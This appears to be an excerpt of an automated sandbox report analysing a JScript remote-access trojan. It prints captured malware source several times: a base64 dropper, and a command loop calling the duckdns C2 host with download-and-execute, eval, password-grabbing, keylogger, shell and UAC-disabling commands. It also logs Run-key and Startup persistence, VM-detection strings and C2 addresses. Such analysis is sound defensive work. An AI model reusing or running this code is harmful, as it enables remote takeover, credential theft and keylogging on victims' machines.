= WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");var stubpath1 = appdatadir1 + "\\CekIalTska.js";var decoded1 = decodeBase64(longText1);writeBytes(stubpath1, decoded1);wshShell1.run("wscript //B \"" + stubpath1 + "\"");}catch(er){}function writeBytes(file, bytes){try{var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}catch(err){}}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}wshShell1 = null;//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=var host = "jbd231.duckdns.org";var port = 2022;var installdir = "%appdata%";var lnkfile = true;var lnkfolder = true;//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=var shellobj = WScript.createObject("wscript.shell");var filesystemobj = WScript.createObject("scripting.filesystemobject");var httpobj = WScript.createObject("msxml2.xmlhttp");//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=var installname = WScript.scriptName;var startup = shellobj.specialFolders("startup") + "\\";installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}var spliter = "|";var sleep = 5000;var response, cmd, param, oneonce;var inf = "";var usbspreading = "";var startdate = "";//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=instance();while(true){try{install();response = "";response = post ("is-ready","");cmd = response.split(spliter);switch(cmd[0]){case "disconnect":WScript.quit();break;case "reboot":shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);break;case "shutdown":shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);break;case "excecute":param = cmd[1];eval(param);break;case "get-pass":passgrabber(cmd[1], "cmdc.exe", cmd[2]);break;case "uninstall":uninstall();break;case "up-n-exec":download(cmd[1],cmd[2]);break;case "bring-log":upload(installdir + "wshlogs\\" + cmd[1], "take-log");break;case "down-n-exec":sitedownloader(cmd[1],cmd[2]);break;case "filemanager":servicestarter(cmd[1], "fm-plugin.exe", information());break;case "rdp":servicestarter(cmd[1], "rd-plugin.exe", information());break;case "keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0);break;case "offline-keylogger":keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1);break;case "browse-logs":post("is-logs", enumfaf(installdir + "wshlogs"));break;case "cmd-shell":param = cmd[1];post("is-cmd-shell",cmdshell(param));break;case "get-processes":post("is-processes", enumprocess());break;case "disable-uac":if(WScript.Arguments.Named.Exists("elevated") == true){var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");oReg.

Boot Survival

barindex
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CekIalTska.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Order Requirement 2022.js\:Zone.Identifier:$DATA
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Order Requirement 2022 Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 2022
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 2022
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: wscript.exe, 00000001.00000003.378665321.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.879539716.00000228B3204000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379252266.00000228B3205000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.892923244.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401665667.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401299378.0000025291BAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000002.869027680.0000026E2AEB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW?
Source: wscript.exe, 00000008.00000002.853778146.0000029D8033B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>'
Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379481262.00000228B319F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exe Domain query: jbd231.duckdns.org
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.150.138 2022
Source: C:\Windows\System32\wscript.exe Network Connect: 154.120.126.87 5465
Source: C:\Windows\System32\wscript.exe Domain query: javaautorun.duia.ro
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.144.237 2022 Jump to behavior
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rpwinmgmts:\\localhost\root\securitycenter3
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displaynameq
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $volumeserialnumber
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copyfile
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: namespace
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t:p_m
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sh = cr(0);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fs = cr(1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var spl = "|v|";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ch = "\\";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vn = "9/21" + "_" + ob(6);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fu = wscript.scriptfullname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wn = wscript.scriptname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var u;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = sh.regread(g[2]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sv = fu.split("\\");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
